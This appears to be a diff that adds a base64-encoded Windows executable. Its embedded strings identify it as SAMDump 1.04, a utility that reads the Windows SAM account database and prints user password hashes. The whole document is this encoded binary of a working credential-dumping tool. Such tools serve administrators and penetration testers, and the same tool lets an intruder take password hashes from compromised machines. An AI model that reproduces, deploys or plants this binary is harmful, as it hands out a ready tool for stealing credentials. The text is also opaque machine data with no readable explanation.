+aXdhbgAAc3dpdHplcmxhbmQAc3dlZGVuAABzd2UAc3ZrAHNwYWluAAAAc291dGgta29yZWEAc291
+dGgga29yZWEAc2dwAHNpbmdhcG9yZQAAAHJ1c3NpYQAAcHJ0AHByLWNoaW5hAAAAAHByIGNoaW5h
+AAAAAHBvcnR1Z2FsAAAAAHBvbGFuZAAAcG9sAG56bABuegAAbm9yd2F5AABuZXctemVhbGFuZABu
+ZXcgemVhbGFuZABuZXRoZXJsYW5kcwBtZXhpY28AAG1leABrb3JlYQAAAGphcGFuAAAAaXRhbHkA
+AABpcmwAaXJlbGFuZABpY2VsYW5kAGh1bmdhcnkAaG9uZy1rb25nAAAAaG9uZyBrb25nAAAAaG9s
+bGFuZABoa2cAZ3JlZWNlAABncmVhdCBicml0YWluAAAAZ3JjAGdlcm1hbnkAZ2JyAGZyYW5jZQAA
+ZmlubGFuZABlbmdsYW5kAGRuawBkZW5tYXJrAGN6ZQBjaG4AY2hpbmEAAABjaGUAY2FuYWRhAABj
+YW4AYnJpdGFpbgBicmF6aWwAAGJyYQBiZWxnaXVtAGJlbABhdXQAYXVzdHJpYQBhdXN0cmFsaWEA
+AABhdXMAYW1lcmljYQB1c2EAdXMAAHVrAAB0dXJraXNoAHRyawBzd2lzcwAAAHN3ZWRpc2gAc3Zl
+AHNwYW5pc2gtbW9kZXJuAABzcGFuaXNoLW1leGljYW4Ac3BhbmlzaABzbG92YWsAAHNreQBydXNz
+aWFuAHJ1cwBwdGcAcHRiAHBvcnR1Z3Vlc2UtYnJhemlsaWFuAAAAAHBvcnR1Z3Vlc2UAAHBvbGlz
+aAAAcGxrAG5vcndlZ2lhbi1ueW5vcnNrAAAAbm9yd2VnaWFuLWJva21hbAAAAABub3J3ZWdpYW4A
+AABub3IAbm9uAG5sZABubGIAa29yZWFuAABrb3IAanBuAGphcGFuZXNlAAAAAGl0cwBpdGFsaWFu
+LXN3aXNzAAAAaXRhbGlhbgBpdGEAaXNsAGlyaXNoLWVuZ2xpc2gAAABpY2VsYW5kaWMAAABodW5n
+YXJpYW4AAABodW4AZ3JlZWsAAABnZXJtYW4tc3dpc3MAAAAAZ2VybWFuLWF1c3RyaWFuAGdlcm1h
+bgAAZnJzAGZyZW5jaC1zd2lzcwAAAABmcmVuY2gtY2FuYWRpYW4AZnJlbmNoLWJlbGdpYW4AAGZy
+ZW5jaAAAZnJjAGZyYgBmcmEAZmlubmlzaABmaW4AZXNwAGVzbgBlc20AZW56AGVudQBlbmkAZW5n
+bGlzaC11c2EAZW5nbGlzaC11cwAAZW5nbGlzaC11awAAZW5nbGlzaC1uegAAZW5nbGlzaC1pcmUA
+ZW5nbGlzaC1jYW4AZW5nbGlzaC1hdXMAZW5nbGlzaC1hbWVyaWNhbgAAAABlbmdsaXNoAGVuZwBl
+bmMAZW5hAGVsbABkdXRjaC1iZWxnaWFuAAAAZHV0Y2gAAABkZXUAZGVzAGRlYQBkYW5pc2gAAGRh
+bgBjemVjaAAAAGNzeQBjaHQAY2hzAGNoaW5lc2UtdHJhZGl0aW9uYWwAY2hpbmVzZS1zaW5nYXBv
+cmUAAABjaGluZXNlLXNpbXBsaWZpZWQAAGNoaW5lc2UtaG9uZ2tvbmcAAAAAY2hpbmVzZQBjaGkA
+Y2hoAGNhbmFkaWFuAAAAAGJlbGdpYW4AYXVzdHJhbGlhbgAAYW1lcmljYW4tZW5nbGlzaAAAAABh
+bWVyaWNhbiBlbmdsaXNoAAAAAGFtZXJpY2FuAAAAAAAAAAAAAAAAAAAAAEdldExhc3RBY3RpdmVQ
+b3B1cAAAR2V0QWN0aXZlV2luZG93AE1lc3NhZ2VCb3hBAHVzZXIzMi5kbGwAAEg6bW06c3MAZGRk
+ZCwgTU1NTSBkZCwgeXl5eQBNL2QveXkAAFBNAABBTQAARGVjZW1iZXIAAAAATm92ZW1iZXIAAAAA
+T2N0b2JlcgBTZXB0ZW1iZXIAAABBdWd1c3QAAEp1bHkAAAAASnVuZQAAAABBcHJpbAAAAE1hcmNo
+AAAARmVicnVhcnkAAAAASmFudWFyeQBEZWMATm92AE9jdABTZXAAQXVnAEp1bABKdW4ATWF5AEFw
+cgBNYXIARmViAEphbgBTYXR1cmRheQAAAABGcmlkYXkAAFRodXJzZGF5AAAAAFdlZG5lc2RheQAA
+AFR1ZXNkYXkATW9uZGF5AABTdW5kYXkAAFNhdABGcmkAVGh1AFdlZABUdWUATW9uAFN1bgAAAAAA
+U3VuTW9uVHVlV2VkVGh1RnJpU2F0AAAASmFuRmViTWFyQXByTWF5SnVuSnVsQXVnU2VwT2N0Tm92
+RGVjAAAAAAAAAAAAAAAAAAAAADj0QACI7EAAAAAAAAAAAAAAAAAAAQAAAJjsQACg7EAAAAAAADj0
+QAAAAAAAAAAAAP////8AAAAAAAAAAAEAAAA48EAAAAAAAP////8AAAAABAAAAAAAAAAAAAAAAQAA
+ALjsQAAAAAAAAAAAAAAAAADY7EAAAQAAAEjwQAAAAAAA/////wAAAAAEAAAAAAAAAAAAAAABAAAA
+8OxAAAAAAAAAAAAAAAAAABDtQAAgBZMZAgAAAEjtQAABAAAAWO1AAAAAAAAAAAAAAAAAAP////8A
+AAAA/////wAAAAAAAAAAAAAAAAEAAAABAAAAcO1AAAAAAAAAAAAAAAAAAAAAAADhF0AAIAWTGQQA
+AACg7UAAAQAAAMDtQAAAAAAAAAAAAAAAAAD/////AAAAAAAAAAC3IUAAAAAAAKohQAD/////AAAA
+AAAAAAACAAAAAwAAAAEAAADY7UAAAAAAAAAAAAA48EAArP///8QhQAAgBZMZAwAAAAjuQAABAAAA
+IO5AAAAAAAAAAAAAAAAAAP////8AAAAAAAAAAMgjQAD/////AAAAAAAAAAABAAAAAgAAAAEAAAA4
+7kAAAAAAAAAAAAA48EAA0P///9UjQAAgBZMZAwAAAGjuQAABAAAAgO5AAAAAAAAAAAAAAAAAAP//
+//8AAAAAAAAAAHMlQAD/////AAAAAAAAAAABAAAAAgAAAAEAAACY7kAAAAAAAAAAAAA48EAAxP//
+/4AlQAAgBZMZAwAAAMjuQAABAAAA4O5AAAAAAAAAAAAAAAAAAP////8AAAAAAAAAAGonQAD/////
+AAAAAAAAAAABAAAAAgAAAAEAAAD47kAAAAAAAAAAAAA48EAAwP///3cnQAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAgVUAAAAAAAAAAAAAATEAAcI1AAAAAAAAAAAAA0ExAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAABOFAAAAAAAAuSgAAAAAAAAThQAAAAAAALkgAAFwAAAByYgAAAAAAAGNoZWNrX3ZwOiBt
+YWxsb2MgZmFpbCBmb3IgaG9tZWRpci4KAGNoZWNrX3ZwOiBtYWxsb2MgZmFpbCBmb3IgY29tbWVu
+dC4KAGNoZWNrX3ZwOiBtYWxsb2MgZmFpbCBmb3IgdXNlcm5hbWUuCgAAAAAlMDJYAAAAADoKAAAs
+AAAAJXMAADoAAABOTyBQQVNTV09SRCoqKioqKioqKioqKioqKioqKioqKgAAAAAqKioqKioqKioq
+KioqKioqKioqKioqKioqKioqKioqKgAAAAAlczolZDoAAEZhaWxlZCB0byBwYXJzZSBlbnRyeSBm
+b3IgUklEICVYCgAAAHByaW50b3V0X3NtYl9lbnRyeTogVW5hYmxlIHRvIHJlYWQgdXNlciAnVicg
+dmFsdWUuIEVycm9yIHdhcyAlcy4KLgAAcHJpbnRvdXRfc21iX2VudHJ5OiBtYWxsb2MgZmFpbCBm
+b3IgdXNlciBlbnRyeS4KAAAAAHByaW50b3V0X3NtYl9lbnRyeTogVW5hYmxlIHRvIGRldGVybWlu
+ZSBzaXplIG5lZWRlZCBmb3IgdXNlciAnVicgdmFsdWUuIEVycm9yIHdhcyAlcy4KLgBWAAAAZW51
+bWVyYXRlX3VzZXJzOiBGYWlsZWQgdG8gb3BlbiBrZXkgJXMgdG8gcmVhZCB2YWx1ZS4gRXJyb3Ig
+d2FzICVzLgoAAAAAX1JlZ09wZW5LZXlFeCBlcnJvcjogJWQKAAAAAFNBTVxEb21haW5zXEFjY291
+bnRcVXNlcnMAAABfUmVnT3BlbkhpdmUgZXJyb3I6ICVkCgBVc2FnZToKICBTQU1EVU1QIDxTQU0g
+ZmlsZSBuYW1lPgoAAABTQU1EdW1wIDEuMDQuIENyZWF0ZWQgYnkgRG1pdHJ5IEFuZHJpYW5vdgoA
+AAAAAAAAAAAAAQEBAQEBAQH+/v7+/v7+/h8fHx8fHx8f4ODg4ODg4OAB/gH+Af4B/v4B/gH+Af4B
+H+Af4A7xDvHgH+Af8Q7xDgHgAeAB8QHx4AHgAfEB8QEf/h/+Dv4O/v4f/h/+Dv4OAR8BHwEOAQ4f
+AR8BDgEOAeD+4P7x/vH+/uD+4P7x/vEAAAAAAAAAAAEAAAABAAAAAQAAAAEAAAABAAAAAQAAAAAA
+AAABAAAAAQAAAAEAAAABAAAAAQAAAAEAAAAAAAAAREVTIHBhcnQgb2YgU1NMZWF5IDAuNi42IDE0
+LUphbi0xOTk3AAAAAGxpYmRlcyB2IDQuMDEgLSAxMy1KYW4tMTk5NyAtIGVheQAAAAj0QADg80AA
+AQAAAAThQAAAAAAALj9BVnR5cGVfaW5mb0BAAFBVQAAAAAAAAQAAABYAAAACAAAAAgAAAAMAAAAC
+AAAABAAAABgAAAAFAAAADQAAAAYAAAAJAAAABwAAAAwAAAAIAAAADAAAAAkAAAAMAAAACgAAAAcA
+AAALAAAACAAAAAwAAAAWAAAADQAAABYAAAAPAAAAAgAAABAAAAANAAAAEQAAABIAAAASAAAAAgAA
+ACEAAAANAAAANQAAAAIAAABBAAAADQAAAEMAAAACAAAAUAAAABEAAABSAAAADQAAAFMAAAANAAAA
+VwAAABYAAABZAAAACwAAAGwAAAANAAAAbQAAACAAAABwAAAAHAAAAHIAAAAJAAAABgAAABYAAACA
+AAAACgAAAIEAAAAKAAAAggAAAAkAAACDAAAAFgAAAIQAAAANAAAAkQAAACkAAACeAAAADQAAAKEA
+AAACAAAApAAAAAsAAACnAAAADQAAALcAAAARAAAAzgAAAAIAAADXAAAACwAAABgHAAAMAAAAIAWT
+GQAAAAAAAAAAAAAAABAPQQAAAAAAEA9BAAEBAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAA
+AgAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAOBQQAAAAAAAAQAAAAAQAAAAAAAAAAAAALALQQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAA4AtBAAAAAAAAAAAAAAAAAPgLQQAAAAAAAAAAAAAAAADIC0EAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////wAAAABQVUAA
+AAAAAEMAAAAAAAAAtOFAAAAAAADwbUAAqOFAAJD5QABQq0AAnOFAAJD5QACgqEAAkOFAAJD5QACg
+pUAAhOFAAJD5QAAwo0AAfOFAAJD5QADAm0AAAAAAAAAAAAAAAAAAAAAAAEMAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAABDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAEAAAAuAAAAAQAAAAAAAAAAAAAA0OFAAMDhQAD/////AAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAavtAAGr7QAAAACAAIAAgACAAIAAgACAAIAAgACgAKAAoACgAKAAgACAAIAAg
+ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABIABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAA
+EAAQAIQAhACEAIQAhACEAIQAhACEAIQAEAAQABAAEAAQABAAEACBAIEAgQCBAIEAgQABAAEAAQAB
+AAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAEAAQABAAEAAQABAAggCCAIIAggCCAIIA
+AgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACABAAEAAQABAAIAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAwAsAAAAAAAAAHQAAwAQAAAAAAAAAlgAAwAQA
+AAAAAAAAjQAAwAgAAAAAAAAAjgAAwAgAAAAAAAAAjwAAwAgAAAAAAAAAkAAAwAgAAAAAAAAAkQAA
+wAgAAAAAAAAAkgAAwAgAAAAAAAAAkwAAwAgAAAAAAAAAAwAAAAcAAAB4AAAACgAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAQIECAAAAACkAwAAYIJ5giEAAAAAAAAApt8AAAAAAAChpQAAAAAAAIGf4PwAAAAAQH6A/AAA
+AACoAwAAwaPaoyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIH+AAAAAAAAQP4AAAAAAAC1AwAAwaPa
+oyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIH+AAAAAAAAQf4AAAAAAAC2AwAAz6LkohoA5aLoolsA
+AAAAAAAAAAAAAAAAAAAAAIH+AAAAAAAAQH6h/gAAAABRBQAAUdpe2iAAX9pq2jIAAAAAAAAAAAAA
+AAAAAAAAAIHT2N7g+QAAMX6B/gAAAAACAAAAcORAAAgAAABE5EAACQAAABjkQAAKAAAA9ONAABAA
+AADI40AAEQAAAJjjQAASAAAAdONAABMAAABI40AAGAAAABDjQAAZAAAA6OJAABoAAACw4kAAGwAA
+AHjiQAB4AAAAaOJAAHkAAABY4kAAegAAAEjiQAD8AAAAROJAAP8AAAA04kAAAAAAABCOQAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAMDqQAAABAAAtOpAAAkEAACg6kAACQQAAIzqQAAJBAAAgOpAAAkM
+AAB46kAAEwgAAGzqQAAJEAAAaOpAAAQMAABk6kAABBAAAFzqQAAEBAAASOpAAAQMAAA06kAABAgA
+ACDqQAAEEAAADOpAAAQEAAAI6kAABAgAAATqQAAEBAAAAOpAAAUEAAD46UAABQQAAPTpQAAGBAAA
+7OlAAAYEAADo6UAABwwAAOTpQAAHCAAA4OlAAAcEAADY6UAAEwQAAMjpQAATCAAAxOlAAAgEAADA
+6UAACQwAALzpQAAJEAAAuOlAAAkIAACw6UAACQQAAJzpQAAJBAAAkOlAAAkMAACE6UAACRAAAHjp
+QAAJGAAAbOlAAAkUAABg6UAACQgAAFTpQAAJBAAASOlAAAkEAABE6UAACRgAAEDpQAAJBAAAPOlA
+AAkUAAA46UAACggAADTpQAAKDAAAMOlAAAoEAAAs6UAACwQAACTpQAALBAAAIOlAAAwEAAAc6UAA
+DAgAABjpQAAMDAAAEOlAAAwEAAAA6UAADAgAAPDoQAAMDAAA4OhAAAwQAADc6EAADBAAANToQAAH
+BAAAxOhAAAcMAAC06EAABwgAAKzoQAAIBAAAqOhAAA4EAACc6EAADgQAAJDoQAAPBAAAgOhAAAkY
+AAB86EAADwQAAHjoQAAQBAAAcOhAABAEAABg6EAAEAgAAFzoQAAQCAAAUOhAABEEAABM6EAAEQQA
+AEjoQAASBAAAQOhAABIEAAA86EAAEwgAADjoQAATBAAANOhAABQIAAAw6EAAFAQAACToQAAUBAAA
+EOhAABQEAAD850AAFAgAAPjnQAAVBAAA8OdAABUEAADk50AAFggAAMznQAAWBAAAyOdAABYEAADE
+50AAFggAAMDnQAAZBAAAuOdAABkEAAC050AAGwQAAKznQAAbBAAApOdAAAoEAACU50AACggAAITn
+QAAKDAAAgOdAAB0EAAB450AAHQQAAHDnQAAHCAAAbOdAAB8EAABk50AAHwQAAGDnQAAJCAAAXOdA
+AAkEAABY50AACQQAAMDqQAAAAAAAUOdAAAEAAABM50AAPQAAAEDnQAA9AAAAOOdAACsAAAA050AA
+KwAAADDnQAAgAAAAKOdAACAAAAAk50AANwAAABznQAA3AAAAFOdAACwAAAAQ50AAAgAAAAjnQAAC
+AAAABOdAACkAAAD85kAAVgAAAPjmQABWAAAA9OZAACoAAAD46UAAKgAAAOzmQAAtAAAA4OlAADEA
+AADo5kAALQAAAODmQAAsAAAAMOlAACIAAAAs6UAAZgEAANjmQABmAQAAIOlAACEAAADQ5kAAIQAA
+AMzmQAAsAAAAxOZAADEAAADA5kAAHgAAALDmQAAsAAAAqOZAAB4AAACk5kAAVAMAAJzmQAAfAAAA
+kOZAAFQDAACE5kAAVAMAAKjoQAAkAAAAfOZAACQAAAB05kAAYgEAAGzmQABhAQAAaOZAAGEBAAB8
+6EAAYgEAAHjoQAAnAAAAYOZAACcAAABY5kAAUQAAAEzoQABRAAAASOhAAFIAAABQ5kAAUgAAAEzm
+QAA0AAAAROZAADQAAAA45kAAHwAAACzmQABAAAAAIOZAAEAAAAA46EAAHwAAADDoQAAvAAAAGOZA
+AC8AAAAU5kAAQAAAABDmQABAAAAADOZAADAAAAAE5kAAMAAAAPjlQABfAQAA7OVAAFYAAADg5UAA
+VgAAANzlQABfAQAAwOdAAAcAAADU5UAABwAAAMjlQABBAAAAxOVAAEEAAACs50AAKgAAALjlQABS
+AAAArOVAAFIAAACk5UAAIgAAAKDlQAAqAAAAnOVAAC4AAACU5UAALgAAAIjlQAApAAAAgOVAAHYD
+AAB85UAAWgAAAHTlQABaAAAAcOVAAHYDAABg50AALAAAAGDlQAAsAAAAUOVAAAEAAABA5UAALAAA
+ADDlQAABAAAAXOdAAAEAAABY50AAAQAAAAAAAAAAAAkEAAAAAAkQDAwAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAABkEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgEAAAAABMEAAAAABMIDAgAAAwEAAAA
+AAoEAAAAAAAAAAAAAA4EAAAAAAAAAAAAAAAAAAAAABAEAAAAAAAAAAAAAAcIDBAQCAUEGwQAAAcM
+AAAAAAkIAAAAAAYEAAAAAB0EAAAAABQEAAAAABUEAAAAAAcEAAAAAAAAAAAAABYIAAAAAAoIAAAA
+AAkYAAAAAA8EAAAAABYEAAAAAAAAAAAAAAAAAAAAAAsEAAAAAAAAAAAAAAAAAAAAAAkMAAAAAAAA
+AAAAAAAAAAAAAAkUAAAAAAQQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABEE
+AAAAABIEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8EAAAA
+AAAAAAAAACC7QAAgu0AAILtAACC7QAAgu0AAILtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAo7EAAJOxAACDsQAAc7EAAGOxAABTsQAAQ7EAACOxAAADsQAD460AA7OtA
+AODrQADY60AAzOtAAMjrQADE60AAwOtAALzrQAC460AAtOtAALDrQACs60AAqOtAAKTrQACg60AA
+nOtAAJTrQACI60AAgOtAAHjrQAC460AAcOtAAGjrQABg60AAVOtAAEzrQABA60AANOtAADDrQAAs
+60AAJOtAABDrQAAI60AAMAlBAAAAAAAAAAAALgAAAAAAAADoCUEA7AlBAOwJQQDsCUEA7AlBAOwJ
+QQDsCUEA7AlBAOwJQQDsCUEAf39/f39/f3/wCUEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAACAcAAAAQAAAPDx//8AAAAAUFNUAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBEVAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgCkEAoApBAAAA
+AAAAAAAA/////wAAAAAAAAAAAAAAAP////8AAAAAAAAAAAAAAAD/////HgAAADsAAABaAAAAeAAA
+AJcAAAC1AAAA1AAAAPMAAAARAQAAMAEAAE4BAABtAQAAAAAAAP////8eAAAAOgAAAFkAAAB3AAAA
+lgAAALQAAADTAAAA8gAAABABAAAvAQAATQEAAGwBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoIAEAAAAA
+AAAAAAAWJgEAGCEBAAAAAAAAAAAAAAAAAAAAAAAAAAAAJCQBABoiAQAmIgEAMiIBAEQiAQBQIgEA
+XCIBAHIiAQCCIgEAkCIBAKQiAQC4IgEAyiIBANgiAQDmIgEAAiMBABojAQAyIwEASiMBAGgjAQB+
+IwEAjCMBAJgjAQCoIwEAtiMBAMIjAQDUIwEA4iMBAPQjAQACJAEAEiQBAAgiAQBAJAEAViQBAHAk
+AQCGJAEAniQBALgkAQDSJAEA3iQBAOgkAQD0JAEAACUBABAlAQAgJQEAMCUBAEAlAQBUJQEAYiUB
+AHIlAQCCJQEAlCUBAKYlAQC4JQEAyCUBANYlAQDiJQEA8iUBAAQmAQAAAAAAJCQBABoiAQAmIgEA
+MiIBAEQiAQBQIgEAXCIBAHIiAQCCIgEAkCIBAKQiAQC4IgEAyiIBANgiAQDmIgEAAiMBABojAQAy
+IwEASiMBAGgjAQB+IwEAjCMBAJgjAQCoIwEAtiMBAMIjAQDUIwEA4iMBAPQjAQACJAEAEiQBAAgi
+AQBAJAEAViQBAHAkAQCGJAEAniQBALgkAQDSJAEA3iQBAOgkAQD0JAEAACUBABAlAQAgJQEAMCUB
+AEAlAQBUJQEAYiUBAHIlAQCCJQEAlCUBAKYlAQC4JQEAyCUBANYlAQDiJQEA8iUBAAQmAQAAAAAA
+iABGb3JtYXRNZXNzYWdlQQAAggFMb2NhbEZyZWUAWQFIZWFwRnJlZQAArgFSYWlzZUV4Y2VwdGlv
+bgAAUwFIZWFwQWxsb2MAxwFSdGxVbndpbmQAQgJXaWRlQ2hhclRvTXVsdGlCeXRlAOEAR2V0TGFz
+dEVycm9yAABiAEV4aXRQcm9jZXNzAB0CVGVybWluYXRlUHJvY2VzcwAAxABHZXRDdXJyZW50UHJv
+Y2VzcwCfAEdldENvbW1hbmRMaW5lQQA3AUdldFZlcnNpb24AAFUBSGVhcENyZWF0ZQAAZAFJbml0
+aWFsaXplQ3JpdGljYWxTZWN0aW9uAEQARGVsZXRlQ3JpdGljYWxTZWN0aW9uAE8ARW50ZXJDcml0
+aWNhbFNlY3Rpb24AAHcBTGVhdmVDcml0aWNhbFNlY3Rpb24AABECU2V0VW5oYW5kbGVkRXhjZXB0
+aW9uRmlsdGVyAMcAR2V0Q3VycmVudFRocmVhZElkAAAiAlRsc1NldFZhbHVlAB8CVGxzQWxsb2MA
+AP0BU2V0TGFzdEVycm9yAAAhAlRsc0dldFZhbHVlALgBUmVhZEZpbGUAAPgBU2V0RmlsZVBvaW50
+ZXIAABYAQ2xvc2VIYW5kbGUA+gFTZXRIYW5kbGVDb3VudAAA3ABHZXRGaWxlVHlwZQAWAUdldFN0
+ZEhhbmRsZQAAFAFHZXRTdGFydHVwSW5mb0EAJgJVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAOkA
+R2V0TW9kdWxlRmlsZU5hbWVBAACLAEZyZWVFbnZpcm9ubWVudFN0cmluZ3NBAJMBTXVsdGlCeXRl
+VG9XaWRlQ2hhcgDQAEdldEVudmlyb25tZW50U3RyaW5ncwCMAEZyZWVFbnZpcm9ubWVudFN0cmlu
+Z3NXANIAR2V0RW52aXJvbm1lbnRTdHJpbmdzVwAAmABHZXRDUEluZm8AkgBHZXRBQ1AAAPYAR2V0
+T0VNQ1AAAE8CV3JpdGVGaWxlAGwBSXNCYWRSZWFkUHRyAABvAUlzQmFkV3JpdGVQdHIAaQFJc0Jh
+ZENvZGVQdHIAAAYCU2V0U3RkSGFuZGxlAACDAEZsdXNoRmlsZUJ1ZmZlcnMAACsAQ3JlYXRlRmls
+ZUEAdQFMQ01hcFN0cmluZ0EAAHYBTENNYXBTdHJpbmdXAAAXAUdldFN0cmluZ1R5cGVBAAAaAUdl
+dFN0cmluZ1R5cGVXAAADAUdldFByb2NBZGRyZXNzAAB4AUxvYWRMaWJyYXJ5QQAAXAFIZWFwUmVB
+bGxvYwBdAUhlYXBTaXplAADvAVNldEVuZE9mRmlsZQAA4wBHZXRMb2NhbGVJbmZvQQAA5ABHZXRM
